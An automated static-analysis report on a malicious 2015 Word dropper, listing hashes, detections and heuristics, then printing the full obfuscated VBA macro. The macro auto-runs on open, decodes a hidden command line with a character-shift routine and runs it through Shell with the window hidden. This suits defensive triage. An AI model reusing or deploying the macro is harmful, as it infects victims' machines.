Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 049f8f402af29fcb…

MALICIOUS

Office (OLE)

Size: 53.0 KB
Created: 2015-02-09 20:32:00
Authoring application: Microsoft Office Word
First seen: 2015-02-17
MD5: e1c4c3d995941a2e164f01d9de516651
SHA-1: 61d0086d0407ca77f3f7bb40c6c97cf192171412
SHA-256: 049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598
Risk Score: 178

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. It defines the AutoOpen and Workbook_Open auto-execution subroutines, and a critical heuristic fired on a potential Shell call. The VBA script attempts to write several files with random-looking names to disk, such as 'BVXRMY.OSS' and 'OKBMUC.PQJ', which points to dropper or downloader functionality; the command passed to Shell is built at runtime by the lSqZa routine, which decodes an obfuscated string one character at a time. The ClamAV detection 'Doc.Dropper.Agent-1452123' further supports this assessment.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-1452123 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1452123
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched line in script: Shell HUIbksdf, vbHide
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script: Sub AutoOpen()
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Matched line in script: Sub Workbook_Open()
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7406 bytes
SHA-256: c7898f2f10292e4318d9bf58a265434d53b9feb9f15cb2fe60e05c1e4abb4dff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
125 of 186 identifiers look randomly generated (e.g. 'ODDFHKCGIHCGHLCGGGOMEMED') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub pppJFJF()
Dim cGUWcPxh, zPghPtfu, UYCPVbyB As String

GoTo NqLZpqck
Dim djTTSBnZ As String
Open "BVXRMY.OSS" For Binary As 25
Put #25, , djTTSBnZ
Close #25
NqLZpqck:

cGUWcPxh = "           NQUVUE               "

GoTo lVBiOKpy
Dim YrQqsTfj As String
Open "OKBMUC.PQJ" For Binary As 53
Put #53, , YrQqsTfj
Close #53
lVBiOKpy:

zPghPtfu = LTrim(cGUWcPxh)

GoTo HkDNvmSG
Dim GejSxxlg As String
Open "DJGISK.VTT" For Binary As 73
Put #73, , GejSxxlg
Close #73
HkDNvmSG:

UYCPVbyB = RTrim(zPghPtfu)


GoTo xPimvGlx
Dim mmQixJNW As String
Open "ENBKSE.MBL" For Binary As 36
Put #36, , mmQixJNW
Close #36
xPimvGlx:

pJIHJffd
End Sub
Sub AutoOpen()
Dim fsvhlMHQ, HcDpekbt, tfLDoeQD As String

GoTo JgaVljrw
Dim emDaWtiT As String
Open "FHWUPH.TFH" For Binary As 72
Put #72, , emDaWtiT
Close #72
JgaVljrw:

fsvhlMHQ = "           RBJRON               "

GoTo qzyELVJp
Dim xiKYmSMm As String
Open "COVXXU.VEH" For Binary As 19
Put #19, , xiKYmSMm
Close #19
qzyELVJp:

HcDpekbt = LTrim(fsvhlMHQ)

GoTo UwWwIAlL
Dim LAUvphxr As String
Open "OLKLJX.NKD" For Binary As 54
Put #54, , LAUvphxr
Close #54
UwWwIAlL:

tfLDoeQD = RTrim(HcDpekbt)


GoTo piYElNqT
Dim wflYMFgH As String
Open "RCGTVA.FQT" For Binary As 11
Put #11, , wflYMFgH
Close #11
piYElNqT:

    pppJFJF
End Sub
Sub Workbook_Open()
Dim XYaWJqQT, WkEUGdkt, uchPjamg As String

GoTo eWqfJCwW
Dim haCjlPbt As String
Open "AHTCPB.QRW" For Binary As 23
Put #23, , haCjlPbt
Close #23
eWqfJCwW:

XYaWJqQT = "           XZFUOU               "

GoTo ngNyTbVR
Dim SmSoifzF As String
Open "SNBLTF.DMJ" For Binary As 66
Put #66, , SmSoifzF
Close #66
ngNyTbVR:

WkEUGdkt = LTrim(XYaWJqQT)

GoTo uxfzOLor
Dim yiJFUWFE As String
Open "XMZOKR.YIK" For Binary As 14
Put #14, , yiJFUWFE
Close #14
uxfzOLor:

uchPjamg = RTrim(WkEUGdkt)


GoTo CRibVecZ
Dim XgQdXtra As String
Open "JCBWBP.IXL" For Binary As 85
Put #85, , XgQdXtra
Close #85
CRibVecZ:

    pppJFJF
End Sub
Sub pJIHJffd()
Dim wyYqjDWy, juHxQJlu, diNOyXHi As String

GoTo tDKSgLQG
Dim jLRHHUFB As String
Open "MZJAUT.QAQ" For Binary As 97
Put #97, , jLRHHUFB
Close #97
tDKSgLQG:

wyYqjDWy = "           JJKPND               "

GoTo cnCkFncE
Dim PYOmhgnF As String
Open "RXLJMW.TGQ" For Binary As 34
Put #34, , PYOmhgnF
Close #34
cnCkFncE:

juHxQJlu = LTrim(wyYqjDWy)

GoTo WMQqErNd
Dim uacftJec As String
Open "GYFDFP.YRI" For Binary As 78
Put #78, , uacftJec
Close #78
WMQqErNd:

diNOyXHi = RTrim(juHxQJlu)


GoTo WHtQyrCA
Dim iXJFUKNS As String
Open "CFZOKE.UZK" For Binary As 77
Put #77, , iXJFUKNS
Close #77
WHtQyrCA:

HUIbksdf = lSqZa("x‚y5D`5e„Њz‡h}zЃЃCzЌz5=czЊBdw zx‰5hЋ€‰z‚Ccz‰ClzwXЃ~zѓ‰>CY„ЊѓЃ„vy[~Ѓz=<}‰‰…ODDFHKCGIHCGHLCGGGOMEMED}}vxЏIJvD‚ѓѓ‚ЏC…}…<A<:iZbe:q…_^d{y{€CzЌz<>Ph‰v‡‰Be‡„xz€€5<:iZbe:q…_^d{y{€CzЌz<P", "21")
Dim uqAjkzBv, SyoSRxJh, jzJuJJIi As String

GoTo xUlExbZu
Dim ODyYVfTk As String
Open "PPOTNF.WVB" For Binary As 36
Put #36, , ODyYVfTk
Close #36
xUlExbZu:

uqAjkzBv = "           QQBAGL               "

GoTo rGIbbLSU
Dim hXmZzUHK As String
Open "AFHEZC.ZUO" For Binary As 97
Put #97, , hXmZzUHK
Close #97
rGIbbLSU:

SyoSRxJh = LTrim(uqAjkzBv)

GoTo QVXmEsXi
Dim CrIctNNl As String
Open "KKCNRU.ZYD" For Binary As 83
Put #83, , CrIctNNl
Close #83
QVXmEsXi:

jzJuJJIi = RTrim(SyoSRxJh)


GoTo nplEclBb
Dim vWChwwTV As String
Open "TDTCSK.HZW" For Binary As 42
Put #42, , vWChwwTV
Close #42
nplEclBb:

Shell HUIbksdf, vbHide
End Sub

Public Function lSqZa(ByVal InputData As String, ByVal NumKey As Integer) As String
Dim i As Long, OutChar As String
For i = 1 To Len(InputData)
Dim LitKzAbh, iVqwidQV, xFhBdBCY As String

GoTo bjGCAYXH
Dim QxANrlBa As String
Open "TJGYFV.YPI" For Binary As 43
Put #43, , QxANrlBa
Close #43
bjGCAYXH:

LitKzAbh = "           SDZPQV               "

GoTo ubrKTByj
Dim lTHWuDpA As String
Open "XWCRHI.DMJ" For Binary As 94
Put #94, , lTHWuDpA
Close #94
ubrKTByj:

iVqwidQV = LTrim(LitKzAbh)

GoTo zenrdrDZ
Dim foduFKJD As String
Open "NMDKWE.AFT" For Binary As 99
Put #99, , foduFKJD
Close #99
zenrdrDZ:

xFhBdBCY = RTrim(iVqwidQV)


GoTo EMGXEnli
Dim GNABtfxl As String
Open "FHMFRF.FOS" For Binary As 48
Put #48, , GNABtfxl
Close #48
EMGXEnli:

OutChar = Asc(Mid(InputData, i, 1)) - NumKey
While OutChar < 0
Dim BKGHJxMo, qVALlqCl, crfXWVaE As String

GoTo qearGJfJ
Dim xoDukTka As String
Open "RMNKPX.FIH" For Binary As 44
Put #44, , xoDukTka
Close #44
qearGJfJ:

BKGHJxMo = "           VUITOD               "

GoTo eNFziNyi
Dim gyntOFol As String
Open "NLLJLA.ASQ" For Binary As 23
Put #23, , gyntOFol
Close #23
eNFziNyi:

qVALlqCl = LTrim(BKGHJxMo)

GoTo VEqfFyDl
Dim XfFaSilL As String
Open "JCNGMQ.AQH" For Binary As 85
Put #85, , XfFaSilL
Close #85
VEqfFyDl:

crfXWVaE = RTrim(qVALlqCl)


GoTo SHUnxVOu
Dim QnqfmNgT As String
Open "QEQWQU.ZZY" For Binary As 67
Put #67, , QnqfmNgT
Close #67
SHUnxVOu:

OutChar = OutChar + 256
Dim xbQLzBbC, lbWtxrCV, fntkJimB As String

GoTo SHRSTXlg
Dim QAibEVND As String
Open "QRPAHY.ZZR" For Binary As 67
Put #67, , QAibEVND
Close #67
SHRSTXlg:

xbQLzBbC = "           KAWZLL               "

GoTo RDkQVtsT
Dim HLrFbLgH As String
Open "UZRNBQ.IXX" For Binary As 57
Put #57, , HLrFbLgH
Close #57
RDkQVtsT:

lbWtxrCV = LTrim(xbQLzBbC)

GoTo bjGCRqLK
Dim QcANuVXz As String
Open "TJGYGD.XHP" For Binary As 43
Put #43, , QcANuVXz
Close #43
bjGCRqLK:

fntkJimB = RTrim(lbWtxrCV)


GoTo sCZKpxyg
Dim cegWSqpb As String
Open "VUORTL.GTR" For Binary As 18
Put #18, , cegWSqpb
Close #18
sCZKpxyg:

Wend
Dim XVmMIxzW, ALzhXKMS, yFPPodQR As String

GoTo sCbrlmJx
Dim cesuWiMU As String
Open "TKSKVQ.GYZ" For Binary As 18
Put #18, , cesuWiMU
Close #18
sCbrlmJx:

XVmMIxzW = "           YTXGVR               "

GoTo jhxlghyb
Dim EwowHepP As String
Open "IAPBXO.IME" For Binary As 23
Put #23, , EwowHepP
Close #23
jhxlghyb:

ALzhXKMS = LTrim(XVmMIxzW)

GoTo blUAklyX
Dim QvlRMuoy As String
Open "SZHRVP.XHY" For Binary As 43
Put #43, , QvlRMuoy
Close #43
blUAklyX:

yFPPodQR = RTrim(ALzhXKMS)


GoTo sLKSjUTv
Dim vBRGLwIO As String
Open "THWOCK.GRQ" For Binary As 42
Put #42, , vBRGLwIO
Close #42
sLKSjUTv:

 lSqZa = lSqZa + Chr(OutChar)
Dim JLTHoAGC, ltMPKBvj, IMBfVPPB As String

GoTo Prxklump
Dim IFNrjoaI As String
Open "PPYHOS.MVX" For Binary As 69
Put #69, , IFNrjoaI
Close #69
Prxklump:

JLTHoAGC = "           KHMJRJ               "

GoTo eXyUcSWK
Dim aYOlwFAj As String
Open "MYVVSA.MNH" For Binary As 98
Put #98, , aYOlwFAj
Close #98
eXyUcSWK:

ltMPKBvj = LTrim(JLTHoAGC)

GoTo ofzXlUqM
Dim uBTOkOHl As String
Open "XGXYPB.DFH" For Binary As 12
Put #12, , uBTOkOHl
Close #12
ofzXlUqM:

IMBfVPPB = RTrim(ltMPKBvj)


GoTo UvUAmuNT
Dim TpqfloYt As String
Open "OWQWPS.NLY" For Binary As 54
Put #54, , TpqfloYt
Close #54
UvUAmuNT:

Next
End Function